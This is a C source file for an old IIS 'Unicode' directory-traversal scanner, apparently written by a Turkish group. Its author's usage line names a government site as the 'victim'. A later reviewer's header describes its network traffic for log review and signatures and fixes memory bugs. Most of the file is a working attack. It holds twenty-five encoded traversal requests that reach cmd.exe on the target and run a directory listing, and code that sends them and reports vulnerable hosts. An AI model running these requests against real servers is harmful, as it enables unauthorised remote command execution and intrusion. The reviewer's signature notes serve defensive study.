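/*
 * iss.c - checks an IIS web server for the "Unicode" directory-traversal bug.
 *
 * Rammstein - admin@xmirc.com - irc.ada.net.tr #root
 * Rooting Sabotage Forced - www.rooting.cjb.net
 *
 * Usage:   ./iss <host>
 * Compile: gcc -o iss iss.c
 *
 * Author's note (translated from Turkish): the code of this program is not
 * entirely mine; I made the necessary changes and updated it with the most
 * commonly found Unicode bugs. Thanks to PcKiLLeR, CiLeK, Cancer-X and
 * Sephiroth, who contributed to the program.
 *
 * What the program puts on the wire (for log review and signatures):
 *   - one "HEAD / HTTP/1.0" request, then eight GET requests, each on its
 *     own TCP connection to port 80;
 *   - every request ends in bare LF LF and carries no Host or User-Agent
 *     header;
 *   - every GET path combines "..", an encoded path separator (overlong
 *     UTF-8 forms such as %c0%af, or doubly percent-encoded forms such as
 *     %255c and %%35%63) and "cmd.exe?/c+dir".
 * A hit is reported whenever "200" occurs in the first 19 bytes of the
 * reply, so a server that answers 200 to arbitrary paths is reported as
 * vulnerable.
 *
 * Review notes on this version:
 *   - the published listing declared tmp[10] and hata[10] but assigned
 *     indices 1..25, writing past both arrays on the stack; the tables are
 *     now sized for every index they use;
 *   - both receive buffers were passed to printf("%s")/strstr() without a
 *     guaranteed NUL terminator; recv_text() reserves the last byte;
 *   - a failed connect() was reported but the socket was still used;
 *   - the header names of the 16 #include lines were lost in the published
 *     listing; only the headers this code needs are restored below.
 */
#define _DEFAULT_SOURCE /* herror() is hidden by glibc under -std=c11 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

enum {
    PROBE_SLOTS = 26, /* indices 1..25 are populated, slot 0 is unused */
    PROBES_SENT = 8   /* loop bound of the original: only 1..8 are requested */
};

/*
 * Request lines, indexed from 1 as in the original. Entries 9..25 are never
 * sent. The strings reach send() unformatted, so "%%" goes out as two
 * percent signs. "\ " (entries 13-19, 22, 24, 25) is not a valid C escape:
 * GCC diagnoses it and drops the backslash. The strings are kept exactly as
 * published.
 */
static const char *const probe_request[PROBE_SLOTS] = {
    [1] = "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [2] = "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [3] = "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [4] = "GET /iisadmpwd/..%c0%af../cmd.exe?/c+dir HTTP/1.0\n\n",
    [5] = "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [6] = "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [7] = "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [8] = "GET /scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [9] = "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [10] = "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [11] = "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [12] = "GET /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [13] = "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [14] = "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [15] = "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [16] = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [17] = "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [18] = "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [19] = "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [20] = "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [21] = "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [22] = "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [23] = "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n",
    [24] = "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
    [25] = "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n",
};

/* Text printed next to a hit: the path part of the request with the same index. */
static const char *const probe_label[PROBE_SLOTS] = {
    [1] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir ",
    [2] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir ",
    [3] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir ",
    [4] = "/iisadmpwd/..%c0%af../cmd.exe?/c+dir ",
    [5] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ",
    [6] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ",
    [7] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir ",
    [8] = "/scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir ",
    [9] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ",
    [10] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ",
    [11] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ",
    [12] = "/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ",
    [13] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ",
    [14] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ ",
    [15] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ ",
    [16] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ",
    [17] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ ",
    [18] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ ",
    [19] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ",
    [20] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir ",
    [21] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir ",
    [22] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ",
    [23] = "/..%c0%af../winnt/system32/cmd.exe?/c+dir ",
    [24] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ",
    [25] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ ",
};

/* Prints the four-line ASCII logo exactly as the original listing spells it. */
static void print_logo(void)
{
    printf("\n\t _ ");
    printf("\n\t|_ ._ _ _ | o ");
    printf("\n\t|_ | (/_ (_| | | ");
    printf("\n\t _| ");
}

/*
 * Opens a TCP connection to port 80 of the first address in `he`.
 * Returns the connected socket, or -1 after reporting the error and
 * releasing the descriptor.
 */
static int open_http(const struct hostent *he)
{
    struct sockaddr_in sin;
    int sock;

    /* The address is copied into an IPv4 field; refuse any other size. */
    if (he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof sin.sin_addr) {
        fprintf(stderr, "gethostbyname: not an IPv4 address\n");
        return -1;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        return -1;
    }

    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    memcpy(&sin.sin_addr, he->h_addr_list[0], sizeof sin.sin_addr);

    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) != 0) {
        perror("connect");
        close(sock);
        return -1;
    }
    return sock;
}

/*
 * Receives at most cap - 1 bytes into buf and NUL-terminates the result, so
 * the remote reply can be handed to the string functions.
 * Returns the byte count from recv(); buf is an empty string when that
 * count is zero or negative.
 */
static ssize_t recv_text(int sock, char *buf, size_t cap)
{
    ssize_t got = recv(sock, buf, cap - 1, 0);

    buf[got > 0 ? (size_t)got : 0] = '\0';
    return got;
}

/*
 * Entry point: resolves argv[1], shows the server's reply to "HEAD /", then
 * sends requests 1..PROBES_SENT and prints the label of each one whose reply
 * contains "200".
 * Returns 0 after a completed run, EXIT_FAILURE on a usage or lookup error.
 */
int main(int argc, char *argv[])
{
    static const char status_ok[] = "200";
    static const char head_request[] = "HEAD / HTTP/1.0\n\n";
    char banner[1024];
    char reply[20];
    struct hostent *he;
    int hits = 0;
    int sock;

    if (argc < 2) {
        system("clear");
        print_logo();
        printf("\n\nUnicode Scanner (c) 2002 ");
        printf("\nKullanImI : %s www.victim.telekom.gov.tr \n\n",
               argc > 0 ? argv[0] : "iss");
        return EXIT_FAILURE;
    }

    he = gethostbyname(argv[1]);
    if (he == NULL) {
        herror("gethostbyname");
        return EXIT_FAILURE;
    }

    system("clear");
    print_logo();
    printf("\n\t Unicode Scanner (c) 2002 ");

    /* Banner grab; as in the original, the screen is cleared right after it. */
    sock = open_http(he);
    if (sock >= 0) {
        if (send(sock, head_request, sizeof head_request - 1, 0) >= 0 &&
            recv_text(sock, banner, sizeof banner) > 0) {
            printf("%s", banner);
        }
        close(sock);
    }

    system("clear");
    printf("Tarama YapILIyor..\n\n");

    for (int i = 1; i <= PROBES_SENT; i++) {
        sock = open_http(he);
        if (sock < 0) {
            continue;
        }

        /* Only the start of the status line is read; "200" there is a hit. */
        if (send(sock, probe_request[i], strlen(probe_request[i]), 0) >= 0 &&
            recv_text(sock, reply, sizeof reply) > 0 &&
            strstr(reply, status_ok) != NULL) {
            printf("%s : ", probe_label[i]);
            printf(" Okey unicode bug Bulundu bu iş tamam :)\n");
            ++hits;
        }
        close(sock);
    }

    if (hits) {
        printf("\n Tarama isLemi %s web Sitesi icin bitti.\n", argv[1]);
    } else {
        printf("\n Uzgunum tarama sonucunda Unicode bugu bulunamamIstIr...\n\n");
    }
    return 0;
}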